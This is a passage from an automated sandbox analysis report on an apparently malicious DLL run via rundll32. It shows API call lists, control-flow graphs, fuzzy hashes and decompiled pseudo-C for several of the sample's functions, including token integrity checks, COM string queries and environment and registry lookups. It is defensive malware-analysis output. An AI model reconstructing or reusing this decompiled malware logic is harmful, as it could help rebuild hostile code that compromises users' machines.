                                          			}

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04FD5415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04FD5435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04FD5445
                                          • CloseHandle.KERNEL32(00000000), ref: 04FD5495
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04FD5468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04FD5470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04FD5480
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 9179ca28be2b266af847655ae291f6832360e4939563f973bd7b124b18133b63
                                          • Instruction ID: 850ad55787d22bae2777882a4a530b85f453c8695eba15d271f0ffd2897cb1c5
                                          • Opcode Fuzzy Hash: 9179ca28be2b266af847655ae291f6832360e4939563f973bd7b124b18133b63
                                          • Instruction Fuzzy Hash: 8D213A75D0025CFFEB019FA4EC44EAEBBBAEB49304F0440A5E510A6251C7759E05EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 4fda060-4fda0a6 SysAllocString 187 4fda0ac-4fda0d9 186->187 188 4fda1ca-4fda1ce 186->188 194 4fda0df-4fda0eb call 4fda872 187->194 195 4fda1c8 187->195 189 4fda1d9-4fda1dd 188->189 190 4fda1d0-4fda1d3 SafeArrayDestroy 188->190 192 4fda1df-4fda1e2 SysFreeString 189->192 193 4fda1e8-4fda1ee 189->193 190->189 192->193 194->195 198 4fda0f1-4fda101 194->198 195->188 198->195 200 4fda107-4fda12d IUnknown_QueryInterface_Proxy 198->200 200->195 202 4fda133-4fda147 200->202 204 4fda149-4fda14d 202->204 205 4fda186-4fda18b 202->205 204->205 208 4fda14f-4fda166 StrStrIW 204->208 206 4fda18d-4fda192 205->206 207 4fda1bf-4fda1c4 205->207 206->207 209 4fda194-4fda19f call 4fd1295 206->209 207->195 210 4fda17d-4fda180 SysFreeString 208->210 211 4fda168-4fda171 call 4fd91b5 208->211 215 4fda1a4-4fda1a8 209->215 210->205 211->210 216 4fda173-4fda17b call 4fda872 211->216 215->207 217 4fda1aa-4fda1af 215->217 216->210 219 4fda1ba 217->219 220 4fda1b1-4fda1b8 217->220 219->207 220->207
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 04FDA09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04FDA11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04FDA15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FDA180
                                            • Part of subcall function 04FD91B5: SysAllocString.OLEAUT32(04FDC298), ref: 04FD9205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04FDA1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FDA1E2
                                            • Part of subcall function 04FDA872: Sleep.KERNEL32(000001F4), ref: 04FDA8BA
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 51ebd72220482a502ecb24905792e39588f62516752e99388d21ae3d7245e75c
                                          • Instruction ID: 4e7131c9883a88baca9e1faed4a5a10a94f2de9bdafe225c992f363b2514b0a6
                                          • Opcode Fuzzy Hash: 51ebd72220482a502ecb24905792e39588f62516752e99388d21ae3d7245e75c
                                          • Instruction Fuzzy Hash: 08513036900609AFDB01DFA8D844A9EB7B7FF88740B188969E515EB210EB35ED46CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 222 4fd7c75-4fd7c88 223 4fd7c8f-4fd7c93 StrChrA 222->223 224 4fd7c8a-4fd7c8e 223->224 225 4fd7c95-4fd7ca6 call 4fd58be 223->225 224->223 228 4fd7ca8-4fd7cb4 StrTrimA 225->228 229 4fd7ceb 225->229 231 4fd7cb6-4fd7cbf StrChrA 228->231 230 4fd7ced-4fd7cf4 229->230 232 4fd7cd1-4fd7cdd 231->232 233 4fd7cc1-4fd7ccb StrTrimA 231->233 232->231 234 4fd7cdf-4fd7ce9 232->234 233->232 234->230
                                          C-Code - Quality: 54%
                                          			E04FD7C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E04FD58BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0x4fdc28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0x4fdc28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,075295AC,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?), ref: 04FD7C8F
                                          • StrTrimA.KERNELBASE(?,04FDC28C,00000002,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?,4D283A53), ref: 04FD7CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?,4D283A53,?), ref: 04FD7CB9
                                          • StrTrimA.SHLWAPI(00000001,04FDC28C,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?,4D283A53,?), ref: 04FD7CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 6eb37d6c2ad040b998496e14647af4a415317ff3b5f4f9dd310f79f9ea3def22
                                          • Instruction ID: a91c8fc1a649fad47d84467317a271baf4072c31f8eb5546982cfcef94250fab
                                          • Opcode Fuzzy Hash: 6eb37d6c2ad040b998496e14647af4a415317ff3b5f4f9dd310f79f9ea3def22
                                          • Instruction Fuzzy Hash: DA01B572A05325AFD321AF659C48E3BBEDDEB85A50F150519F841DB240EB61E80396F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 4fd4908-4fd4922 call 4fd11af 238 4fd4938-4fd4946 235->238 239 4fd4924-4fd4932 235->239 241 4fd4958-4fd4973 call 4fd1111 238->241 242 4fd4948-4fd494b 238->242 239->238 248 4fd497d 241->248 249 4fd4975-4fd497b 241->249 242->241 243 4fd494d-4fd4952 242->243 243->241 245 4fd4adb 243->245 247 4fd4add-4fd4ae2 245->247 250 4fd4983-4fd4998 call 4fd1ec4 call 4fd1a4e 248->250 249->250 255 4fd499a-4fd499d CloseHandle 250->255 256 4fd49a3-4fd49a9 250->256 255->256 257 4fd49cf-4fd49e7 call 4fd58be 256->257 258 4fd49ab-4fd49b0 256->258 267 4fd49e9-4fd4a11 memset RtlInitializeCriticalSection 257->267 268 4fd4a13-4fd4a15 257->268 259 4fd4ac6-4fd4acb 258->259 260 4fd49b6 258->260 262 4fd4acd-4fd4ad1 259->262 263 4fd4ad3-4fd4ad9 259->263 264 4fd49b9-4fd49c8 call 4fd7827 260->264 262->247 262->263 263->247 272 4fd49ca 264->272 271 4fd4a16-4fd4a1a 267->271 268->271 271->259 273 4fd4a20-4fd4a36 RtlAllocateHeap 271->273 272->259 274 4fd4a38-4fd4a64 wsprintfA 273->274 275 4fd4a66-4fd4a68 273->275 276 4fd4a69-4fd4a6d 274->276 275->276 276->259 277 4fd4a6f-4fd4a8f call 4fd93d5 call 4fd98f7 276->277 277->259 282 4fd4a91-4fd4a98 call 4fd205b 277->282 285 4fd4a9f-4fd4aa6 282->285 286 4fd4a9a-4fd4a9d 282->286 287 4fd4aa8-4fd4aaa 285->287 288 4fd4abb-4fd4abf call 4fd9b6f 285->288 286->259 287->259 290 4fd4aac-4fd4ab0 call 4fd6cd3 287->290 291 4fd4ac4 288->291 293 4fd4ab5-4fd4ab9 290->293 291->259 293->259 293->288
                                          C-Code - Quality: 57%
                                          			E04FD4908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E04FD11AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x4fdd25c; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x4fdd25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x4fdd164(0, 2);
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E04FD1111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x4fdd2a4; // 0x254a5a8
                                          					if( *0x4fdd25c > 5) {
                                          						_t8 = _t26 + 0x4fde5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x4fdea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E04FD1EC4(_t27, _t27);
                                          					_t31 = E04FD1A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x4fdd270 =  *0x4fdd270 ^ 0x81bbe65d;
                                          						_t32 = E04FD58BE(0x60);
                                          						 *0x4fdd324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x4fdd324; // 0x75295b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x4fdd324; // 0x75295b0
                                          							 *_t51 = 0x4fde845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x4fdd238, 0, 0x43);
                                          							 *0x4fdd2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x4fdd25c; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x4fdd2a4; // 0x254a5a8
                                          								_t13 = _t58 + 0x4fde55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4fdc28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E04FD93D5( ~_v8 &  *0x4fdd270, 0x4fdd00c); // executed
                                          								_t42 = E04FD98F7(0, _t55, _t63, 0x4fdd00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E04FD205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E04FD9B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E04FD6CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x4fdd160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E04FD7827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}

































                                          APIs
                                            • Part of subcall function 04FD11AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04FD4920,00000001), ref: 04FD11BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04FD499D
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • memset.NTDLL ref: 04FD49ED
                                          • RtlInitializeCriticalSection.NTDLL(07529570), ref: 04FD49FE
                                            • Part of subcall function 04FD6CD3: memset.NTDLL ref: 04FD6CED
                                            • Part of subcall function 04FD6CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04FD6D24
                                            • Part of subcall function 04FD6CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04FD4AB5), ref: 04FD6D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04FD4A29
                                          • wsprintfA.USER32 ref: 04FD4A59
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: da0c715f487399f0c2a46f67114c78dad31b1553b73d18d89126493b7ebb6152
                                          • Instruction ID: e5729b9196ac8866deed0a672e3d90836e415a643dd81adadc9479569b28c820
                                          • Opcode Fuzzy Hash: da0c715f487399f0c2a46f67114c78dad31b1553b73d18d89126493b7ebb6152
                                          • Instruction Fuzzy Hash: 4F51D571E41219AFEB21EFB4EC88B6E77ABEB08704F0C0525E101D7184E778F9028B56
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04FD6CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t5 = _t40 + 0x4fdee24; // 0x410025
                                          				_t90 = E04FD4814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E04FD147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E04FD9138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E04FDA5E9(0,  *0x4fdd33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t11 = _t52 + 0x4fde81a; // 0x65696c43
                                          					_t55 = E04FDA5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E04FD74B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E04FD147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E04FD147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E04FD568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0x4fdd260 & 0x00000001) == 0) {
                                          							L14:
                                          							E04FD6E92(_t81, _v60, _v56,  *0x4fdd270, 0);
                                          							_t81 = E04FD6737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E04FD72F2( &_v84, 0);
                                          							}
                                          							E04FD147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0x4fdd2a4; // 0x254a5a8
                                          						_t18 = _t67 + 0x4fde823; // 0x65696c43
                                          						_t70 = E04FDA5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E04FD74B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E04FD147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}





























                                          APIs
                                          • memset.NTDLL ref: 04FD6CED
                                            • Part of subcall function 04FD4814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04FD6D15,00410025,00000005,?,00000000), ref: 04FD4825
                                            • Part of subcall function 04FD4814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04FD4842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04FD6D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04FD4AB5), ref: 04FD6D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: 57396b7812fcf4027021245a6ce82c036f56d268b06864de1f99670c4114d5fd
                                          • Instruction ID: ff0fac9838be7ec164b6709d4117e9dedc7358348860756e29033b3f8e8431b5
                                          • Opcode Fuzzy Hash: 57396b7812fcf4027021245a6ce82c036f56d268b06864de1f99670c4114d5fd
                                          • Instruction Fuzzy Hash: 6F41C072604345AFE711AFA0DC84D6FB7EEEF49208F084A2AF984D7110D671ED06CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 4fd4ffa-4fd503c 352 4fd50c3-4fd50c9 350->352 353 4fd5042-4fd504b 350->353 354 4fd504d-4fd505e SysAllocString 353->354 355 4fd508c-4fd508f 353->355 356 4fd5069-4fd5081 354->356 357 4fd5060-4fd5067 354->357 358 4fd50ed 355->358 359 4fd5091-4fd50a1 SysAllocString 355->359 367 4fd5085-4fd508a 356->367 363 4fd50b5-4fd50b8 357->363 362 4fd50ef-4fd50f2 358->362 360 4fd50cc-4fd50eb 359->360 361 4fd50a3 359->361 360->362 364 4fd50aa-4fd50ac 361->364 362->364 366 4fd50f4-4fd5101 362->366 363->352 365 4fd50ba-4fd50bd SysFreeString 363->365 364->363 368 4fd50ae-4fd50af SysFreeString 364->368 365->352 366->352 367->355 367->363 368->363
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04FD5057
                                          • SysAllocString.OLEAUT32(04FDA6F4), ref: 04FD509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD50AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD50BD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 43a0572c2aa5bdd4179d43c97882b6a60abfc76e3dfe2c811e139f11570b1468
                                          • Instruction ID: 2de03a5231a77d2afeb81585b4963816f2e8455f2547d0006f90df47578ea6ec
                                          • Opcode Fuzzy Hash: 43a0572c2aa5bdd4179d43c97882b6a60abfc76e3dfe2c811e139f11570b1468
                                          • Instruction Fuzzy Hash: 6A31FF7290024AFFCB05DF98D8848AE7BBAFF48340B14951EF5069B250E775A942CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 370 4fd1295-4fd12a9 371 4fd12ae-4fd12b3 370->371 372 4fd12b9-4fd12bc 371->372 373 4fd134a-4fd1351 371->373 374 4fd12be-4fd12d3 Sleep 372->374 375 4fd12d6-4fd12d9 372->375 374->375 375->373 376 4fd12db-4fd12e0 375->376 378 4fd133d-4fd1348 376->378 379 4fd12e2-4fd12f4 376->379 378->373 381 4fd1334-4fd1339 379->381 382 4fd12f6-4fd1303 lstrlenW 379->382 381->378 382->381 383 4fd1305-4fd1313 call 4fd58be 382->383 386 4fd1315-4fd1322 memcpy 383->386 387 4fd1324 383->387 388 4fd132b-4fd132e SysFreeString 386->388 387->388 388->381
                                          C-Code - Quality: 78%
                                          			E04FD1295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0; // executed
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E04FD58BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 1b35120a9a335f225da665103215bffe2f0d81a6ddada14379f76225a402d8b2
                                          • Instruction ID: d2d68f9a072fe8d0fd1df6ca220225db9f7f329a28310c39c7392f001774ab17
                                          • Opcode Fuzzy Hash: 1b35120a9a335f225da665103215bffe2f0d81a6ddada14379f76225a402d8b2
                                          • Instruction Fuzzy Hash: 6C214F7590120AEFDB11EFA4D9889DEBBBAFF49305B144169E945E7200EB30EA42CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

